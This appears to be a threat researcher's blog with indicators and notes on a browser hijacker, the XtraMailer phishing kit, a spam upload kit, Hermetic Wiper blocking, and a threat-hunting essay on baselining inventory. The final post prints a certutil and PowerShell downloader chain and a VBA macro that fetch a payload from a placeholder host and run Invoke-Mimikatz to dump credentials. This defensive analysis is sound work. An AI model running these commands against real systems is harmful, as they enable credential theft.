Friday, December 30, 2022

Browser Hijacker HLoginAssistant.co LoginAssistantTab

 

https://app.any.run/tasks/ab008b3d-fe3b-44f2-bb5d-d6758f46d571

Browser Hijacker HLoginAssistant

establishes persistence in startup 

hku\***\software\microsoft\windows\currentversion\run\IEXPLORE

url: search.hloginassistant.co

https://urlscan.io/result/8164cfc1-df93-4cd0-b7b9-a605d9e241f8/




Saturday, November 5, 2022

XtraMailer spam service phishing tool







 https://twitter.com/neonprimetime/status/1589084560675201024?s=46&t=CMAHRgmBZRQ-vkxgYQ9Znw


#XtraMailer spam service for credential #phishing 

urlscan.io/result/9274723…

mailer login: 62.210.81[.]212/XtraMailerLogin

stolen creds posted to: 62.210.81[.].212/next.php


https://twitter.com/prodaft/status/1286580568801640448?s=46&t=CMAHRgmBZRQ-vkxgYQ9Znw


were here in the past

hxxp://conferencias.falcorp[.]net

hxxp://195.154.164[.]184

hxxp://195.154.164[.]25

htxxp://62.210.72[.]29


tool error message that shows some internal information


urlscan.io/dom/8f93bd4e-7…


/var/www/xtramailer/vendor/laravel/framework/src/Illuminate/Routing/


RouteCollection.php

Router.php

Pipeline.php


Foundation/Http/Kernel.php

/fideloper/proxy/src/TrustProxies.php

/Middleware/TransformsRequest

/CheckForMaintenanceMode.php

/var/www/xtramailer/public/index.php


some related variables to #XtraMailer spam service #phishing tool


FACEBOOK_CALLBACK_URL

FACEBOOK_CLIENT_ID

FACEBOOK_CLIENT_SECRET

FCGI_ROLE

GOOGLE_APPLICATION_CREDENTIALS

MAIL_PASSWORD

MAIL_USERNAME

PUSHER_APP_ID

PUSHER_APP_KEY

PUSHER_APP_SECRET

RMQ_PASSWORD

RMQ_USER





Tuesday, November 1, 2022

Mega Super Autouploader - msau




Related Social Media Posts

 @500mk500

https://twitter.com/500mk500/status/1586505814839558145?s=20&t=e_pnOL_iyOz5x_fGUE5RpQ

Mega Super Autouploader

https://github.com/stamparm/maltrail/commit/7fca81e41937db476b1ddec47a7f01d1152355d6


Login pages found
http://analiticslist[.]com/msau/
http://solien[.]cc/msau/

Related Domains

alternative[.]am amazon-aws-cloud[.]com analiticslist[.]com app[.]sell-dar[.]com blackbirdpedalboards[.]com bwd86[.]com bwd87[.]com ciaraodoherty[.]com course[.]internationalglobalnetwork[.]com elevatearchitecture[.]com epicgeocaching[.]com go2namibia[.]com hellodolly[.]pw irishfireside[.]com megauploader[.]xyz mesonges[.]fr mrmikesgraphics[.]com nederland-server32[.]email nigerianstalk[.]org oficina[.]motonic[.]com[.]br portfolio[.]whitneybennettblog[.]com smokeyrow[.]com solien[.]cc studiomanufacturing[.]com[.]br thermalwise[.]ca tribuna[.]ee unsinkableplunkett[.]com www[.]agshacks[.]com www[.]cccmarketing[.]vegas www[.]cindyhayen[.]com www[.]datatech911[.]com www[.]kellyurbanphotography[.]com www[.]lottiedababy[.]com www[.]luxuryworldinteriors[.]in www[.]sarahbrownphotography[.]com[.]au www[.]thebiggestworld[.]com www[.]treetopscommunications[.]co[.]uk

Root folder names
www/megauploader.xyz/
www/msau/
www/msau_jml/
www/msau2612/

Files in the Kit
work.php
Core/MainSettings.php
DrwContent/ProcessingMacroses.php
DrwContent/ProcessResTemplate.php
DrwContent/Prs.php
DrwContent/GetContent.php

Sample errors found:
Deprecated: Implicit conversion from float 522588.00000000006 to int loses precision in /var/www/html/msau/Core/MainSettings.php on line 357

Deprecated: Implicit conversion from float 252717.00000000003 to int loses precision in /var/www/html/msau/DrwContent/Prs.php on line 90



Warning: preg_replace(): Unknown modifier '\' in /var/www/www-root/data/www/megauploader.xyz/DrwContent/ProcessResTemplate.php on line 83

Warning: preg_replace(): Unknown modifier '\' in /var/www/www-root/data/www/megauploader.xyz/DrwContent/ProcessResTemplate.php on line 83




Warning: shuffle() expects parameter 1 to be array, string given in /var/www/www-root/data/www/megauploader.xyz/Core/MainSettings.php on line 358

Warning: implode(): Invalid arguments passed in /var/www/www-root/data/www/megauploader.xyz/DrwContent/ProcessingMacroses.php on line 122

Warning: shuffle() expects parameter 1 to be array, string given in /var/www/www-root/data/www/megauploader.xyz/Core/MainSettings.php on line 358

Warning: implode(): Invalid arguments passed in /var/www/www-root/data/www/megauploader.xyz/DrwContent/ProcessingMacroses.php on line 139



Fatal error: Uncaught TypeError: preg_replace_callback(): Argument #2 ($callback) must be a valid callback, function "strip_tags_smart" not found or invalid function name in /var/www/html/msau/Core/MainSettings.php:590 Stack trace: #0 /var/www/html/msau/Core/MainSettings.php(590): preg_replace_callback('~ <[/!]?+\n ...', 'strip_tags_smar...', '510 E 84th Stre...') #1 /var/www/html/msau/DrwContent/Prs.php(168): MainSettings->strip_tags_smart('510 E 84th Stre...') #2 /var/www/html/msau/DrwContent/GetContent.php(26): Prs->getSnippets('education+princ...', 7) #3 /var/www/html/msau/work.php(248): GetContent->__construct(Object(MainSettings), 'education princ...', '1f13728d2ef56b6...', Object(Prs)) #4 {main} thrown in /var/www/html/msau/Core/MainSettings.php on line 590


Deprecated: Implicit conversion from float 519715.00000000006 to int loses precision in /var/www/html/msau_jml/Core/MainSettings.php on line 358

Fatal error: Uncaught TypeError: shuffle(): Argument #1 ($array) must be of type array, string given in /var/www/html/msau_jml/Core/MainSettings.php:359 Stack trace: #0 /var/www/html/msau_jml/Core/MainSettings.php(359): shuffle('Ivermectin wher...') #1 /var/www/html/msau_jml/DrwContent/ProcessingMacroses.php(121): MainSettings->shuffleArr('Ivermectin wher...') #2 /var/www/html/msau_jml/DrwContent/ProcessingMacroses.php(31): ProcessingMacroses->UPMIXKEY() #3 /var/www/html/msau_jml/work.php(258): ProcessingMacroses->goWork() #4 {main} thrown in /var/www/html/msau_jml/Core/MainSettings.php on line 359

Notes:
Seems related to Wordpress sites
Seems like redirect spam to porn, pharma, seo spam, etc.

Wednesday, October 19, 2022

IDA Pro Reversing notes

 Notes just for me learning


CPPEH_RECORD = exception handling

__guard_check_icall_fptr = control flow guard

_initterm = creation function pointer table


Friday, March 18, 2022

A Threat Hunting approach using Inventory

You've probably heard it mentioned that one of the first steps in Cybersecurity is Asset Inventory. I can tell you first hand this is so true.  How can you protect things if you don't know what you have? Sadly, at everywhere I've worked, and I think this is a struggle everywhere, it's been a challenge just knowing what you have. I'm not just speaking about Workstation, Server, or user names. Another example would be Software titles, Publishers, and executable names.

I wanted to share with you something I've been doing, as a "Threat Hunter".  You may think it's interesting to take a list of IOCs (indicators of compromise) like malicious IPs, file hashes, file names, urls, or domains and hunt for them on your network. If you think it's targeted and relevant IOCs, that's not a bad idea, but the odds of you getting a hit are low.  Threat actors are very skilled nowadays and have simple ways to generate brand new IPs, domains, urls, file names, and file hashes per target, per victim, and even per user.  

Another more advanced and potentially good threat hunt would be to find a tactic/technique that a threat actor may use, like certain parameters being passed to an executable, certain port and protocol traffic on your network, certain file extensions in emails, etc.  This is cool and could be worthwhile, but is also like finding a needle in a haystack. The MITRE att&ck matrix hads 100s of techniques, and there are so many variations of each technique that a threat actor has the advantage.  If they tweak their method every so slightly, your search may find nothing.

So, what's an even better method?  Here I go back to asset inventory. Knowing what you have in your environment. At my current work I have massive lists built over the years of various things ...

  • All executable names I've ever seen in the environment
  • All software publishers I've ever seen in the environment
  • All file names I've ever seen in the windows folder
  • All domains I've ever seen our IoT network connect to
  • All domains I've ever seen windows applications (excluding browsers) reach out to
  • All Scheduled Task that have ever been created
  • All Windows Services that have ever been installed
  • more random ideas :-) 

Hopefully you get the picture. Massive lists of things I've done at least some level of vetting on, even if it's 30 seconds with a google search, to have some comfort level that it's probably normal or expected.  I have experience doing this for perhaps 15,000 or more systems and yet I'm able to build these lists and believe me, it wasn't as hard as I expected.  Now of course, if you work at a larger organization than that this could get significantly more challenging.  But if you're at a smaller business, I can honestly say I think it's do-able.  

So, why do I have all these lists? I think in many ways, this is my best approach or chance for finding malicious activity. This is my best approach I've found so far for threat hunting.  Instead of looking for malicious IOCs that have a short life and become useless quickly, instead of searching for odd tactics and techniques that may or may not have been used by my threat actors, I look for stuff that I've never seen before in our environment. 

Imagine the following

  • An executable just started running that has never been seen at my work before. That's a good threat hunt find to dig into.
  • A program runs by a software Publisher that has never before been used at work. That's a good threat hunt find to dig into.
  • A program reaches out to a domain that has never been connected to at work before. That's a good threat hunt find to dig into.
  • A scheduled task just got added to a pc that has never been seen before on any pc.  That's a good threat hunt find to dig into.

It's my belief that this is a great way to find anomalies and potentially malicious activity.

A threat actor can change their IOC, a threat actor can change their technique, but in the overall big picture it's going to be hard for a threat actor to generate ONLY program names, urls, domains, IPs, scheduled tasks, or windows services that have already been seen.

The odds are more likely that the threat actor will generate a few program names, urls, domains, ips, scheduled tasks, or windows services that have never been seen before at my work ... and hopefully those show up on my hunt because they don't exist in my list yet ... and hopefully I can identify that they are malicious before the threat actor does anything deterimental.

 

Friday, March 11, 2022

Hermetic Wiper Publisher for AppLocker

 Hermetic Wiper "View Certificate" for your AppLocker publisher blocking pleasures


CN = Hermetica Digital Ltd
O = Hermetica Digital Ltd
L = Nicosia
C = CY






Thursday, January 13, 2022

downloader certutil powershell invoke-mimikatz

sample downloader that executed mimikatz


certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';

$B64 = get-content test.txt ;

$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));

$clear |out-file -filepath 'test.txt';

powershell -version 2 -command "iex (get-content 'test.txt'|out-string);

Invoke-Mimikatz -DumpCreds


VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")


Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")


Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")